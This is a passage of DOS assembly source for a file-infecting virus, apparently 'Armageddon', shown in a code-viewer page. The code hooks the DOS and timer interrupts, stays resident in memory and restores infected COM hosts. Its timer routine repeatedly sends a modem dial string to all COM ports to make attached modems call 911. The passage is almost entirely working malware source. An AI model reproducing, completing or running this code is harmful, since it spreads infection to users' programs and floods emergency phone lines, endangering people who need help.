📄 armag911.asm
字号:
int 21 ;Release Allocated Memory
mov ax,word ptr cs:[filename_seg]
mov ds,ax
mov dx,word ptr cs:[filename_off]
mov ax,4301
mov cx,word ptr cs:[attribs]
int 21 ;Restore File Date/Time
jmp short End_Infect
nop
Pop_And_Quit_Infect:
pop ds
pop dx
jmp short End_Infect
nop
End_Infect:
pop di es bp dx ax cx si bx ds
jmp Go_Int_21
;************************************************************************
;* Timer Click (INT 8) Handler *
;* This is Used to Dial Numbers *
;************************************************************************
Int_08:
push bp ds es ax bx cx dx si di
pushf ;Push flags
;call word ptr cs:[Int_08_Off] ;Run old timer click
db 2e,0ff,1e,26,01
call Timing_Routine
push cs
pop ds
mov ah,5
mov ch,byte ptr [save_time_a]
cmp ah,ch
ja Quit_Int_08
;if [save_time_a] !=6, quit.
mov ah,6
cmp ah,ch
jb Quit_Int_08
mov ah,byte ptr [Ready_Byte]
cmp ah,1
je Go_Dial
mov ah,1
mov byte ptr [Ready_Byte],ah
jmp short Quit_Int_08
nop
Go_Dial:
call Write_Ports
inc word ptr [Bytes_Written]
mov ax,word ptr [Bytes_Written]
cmp ax,21C
jne Quit_Int_08
xor ax,ax ;Reset Counters
mov byte ptr [Ready_Byte],ah
mov word ptr [Bytes_Written],ax
mov byte ptr [Data_Ready],ah
Quit_Int_08:
pop di si dx cx bx ax es ds bp
iret
;****************************************************************************
;* Timing Routine For Dialing *
;****************************************************************************
Timing_Routine:
push cs
pop ds
xor al,al
mov ah,byte ptr [Timing_Counter]
cmp ah,11
jne Inc_Time_Count
mov ah,byte ptr [save_date]
cmp ah,3bh
jne Inc_Saved_Date
mov ah,byte ptr [save_time_b]
cmp ah,3bh
jne Inc_S_T_B
mov ah,byte ptr [save_time_a]
cmp ah,17
jne Inc_S_T_A
mov byte ptr [save_time_a],al
Save_T_B:
mov byte ptr [save_time_b],al
Store_Save_Date:
mov byte ptr [save_date],al
Time_Count:
mov byte ptr [Timing_Counter],al
ret
Inc_Time_Count:
inc byte ptr [Timing_Counter]
ret
Inc_Saved_Date:
inc byte ptr [save_date]
jmp short Time_Count
Inc_S_T_B:
inc byte ptr [save_time_b]
jmp short Store_Save_Date
Inc_S_T_A:
inc byte ptr [save_time_a]
jmp short Save_T_B
dial_string db '+++aTh0m0s7=35dp911,,,,,,,' ;Dial string To call
;911 and wait
;****************************************************************************
;* Write Data to Com Ports *
;****************************************************************************
Write_Ports:
mov al,byte ptr [Data_Ready]
cmp al,1
je Ret_Write_Ports ; Jump if equal
mov al,byte ptr [Ports_Initialized] ;Have Ports been
cmp al,1 ;Initialized yet?
je Already_Initialized
mov cx,3
Init_Ports:
mov dx,cx
xor ah,ah
mov al,83 ;Init Comport
int 14 ;1200 Baud, No Parity,
;1 Stop Bit, 8 bit Word Len.
loop Init_Ports ;Initalize all Ports 1-4
mov al,1
mov byte ptr [Ports_Initialized],al
jmp short Ret_Write_Ports
nop
Already_Initialized:
push cs
pop ds
mov si,offset dial_string
mov al,byte ptr [Character_Count]
cmp al,1A
jne Write_From_SI_To_Ports
jmp short Setup_write
nop
Write_From_SI_To_Ports:
xor ah,ah
add si,ax
mov al,[si]
mov dx,3F8 ;Outport from SI to standard
out dx,al ;addresses of ports 1-4
mov dx,2F8 ;and increment character count
out dx,al
mov dx,2E8
out dx,al
mov dx,3E8
out dx,al
inc byte ptr [Character_Count]
jmp short Ret_Write_Ports
nop
Setup_write:
mov cx,3
Write_To_All_Ports:
mov dx,cx
mov al,0dh
mov ah,1
int 14 ;Write a 1 to all ports
loop Write_To_All_Ports
mov ax,1
mov byte ptr [Data_Ready],al
mov byte ptr [Character_Count],ah
mov byte ptr [Ports_Initialized],ah
Ret_Write_Ports:
ret
;****************************************************************************
; Virus Entry Point
;****************************************************************************
Virus_Entry:
mov ah,0e0
int 21 ;Check for Installation
cmp ax,0dada ;Was it installed?
jne Install_Virus ;No? Then install it.
jmp Already_Installed ;Yes? Go to Already_Installed
Install_Virus:
push cs
pop ds
mov ax,3521 ;Get Int 21 Address
int 21
mov word ptr [Int_21_Off],bx ;Save old Int 21
mov word ptr [Int_21_Seg],es ;Vector
mov dx,offset Int_21
mov ax,2521
int 21 ;Set Int 21
mov ax,3508
int 21 ;Get Int 8 Address
mov word ptr [Int_08_Off],bx
mov word ptr [Int_08_Seg],es ;Save old Vectors
mov dx,offset Int_08
mov ax,2508
int 21 ;Set Int 08
mov ah,2C
int 21 ;Get Time
mov byte ptr [save_time_a],ch
mov byte ptr [save_time_b],cl ;Save Time and Date
mov byte ptr [save_date],dh
mov ax,cs:[2c] ;Get environment block
mov ds,ax ;address and put it in DS
xor si,si ;DS:SI=beginning of Env. B.
Find_The_Filename:
mov al,[si] ;Search through environment
cmp al,1 ;block for program executed.
je Found_Filename
inc si
jmp short Find_The_Filename
Found_Filename:
inc si
inc si
mov dx,si ;DS:DX = Filename
mov ax,cs
mov es,ax ;Set segment (ES) = CS
mov bx,5a ;Request 5a0h (1440 dec) bytes
mov ah,4a
int 21 ;Change Allocated Memory
mov bx,word ptr cs:[81] ;Beginning of Command Line
mov ax,cs
mov es,ax ;set ES=CS again.
mov word ptr cs:[cs_save_1],ax
mov word ptr cs:[cs_save_2],ax ;Re-Execute program
mov word ptr cs:[cs_save_3],ax ;To make Int 27 cause
mov ax,4B00 ;program to go mem-res
mov word ptr cs:[save_ss],ss ;without terminating
mov word ptr cs:[save_sp],sp ;regular program.
pushf
;call far cs:[Int_21_Off] ;Call Load and Execute
db 2e,0ff,1e,22,01
mov ax,word ptr cs:[save_ss]
mov ss,ax
mov ax,word ptr cs:[save_sp] ;Restore Stack
mov sp,ax
mov ax,cs
mov ds,ax
mov dx,537 ;DX=End of virus
int 27 ;Terminate & stay resident
Already_Installed:
mov ah,0E1 ;Get CS of virus in memory
int 21
mov si,offset Install_Jump
mov cs:[si+3],ax ;Setup Jump
mov ax,offset After_Jump
mov cs:[si+1],ax
mov ax,word ptr cs:[file_size]
mov bx,cs
Install_Jump:
db 0ea
IP_For_Jump db 0,0
CS_For_Jump db 0,0
After_Jump:
mov cx,ax
mov ds,bx
mov si,100
mov di,offset storage_bytes
Restore_File: ;Restore File in memory
mov al,[di]
mov [si],al
inc si
inc di
loop Restore_File
mov si,offset return_jump
mov cs:[si+3],ds ;set host segment
mov al,byte ptr ds:[100] ;Get first byte of host,
sub al,0bh ;then unencrypt first byte
mov byte ptr ds:[100],al ;of Storage_Bytes
mov ax,ds ;and restore it
mov es,ax ;restore ES and SS to point
mov ss,ax ;to DS/CS
;* jmp far ptr start ;Return control to COM file
return_jump:
db 0ea
host_offset db 00,01
host_segment db 07,13
Text_Message db 'Support Your Police'
end_main_virus:
Storage_Bytes db 0D8,20 ;First Byte Encrypted
end_of_vir:
word_space db 8 dup (?)
new_DTA :
end start
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -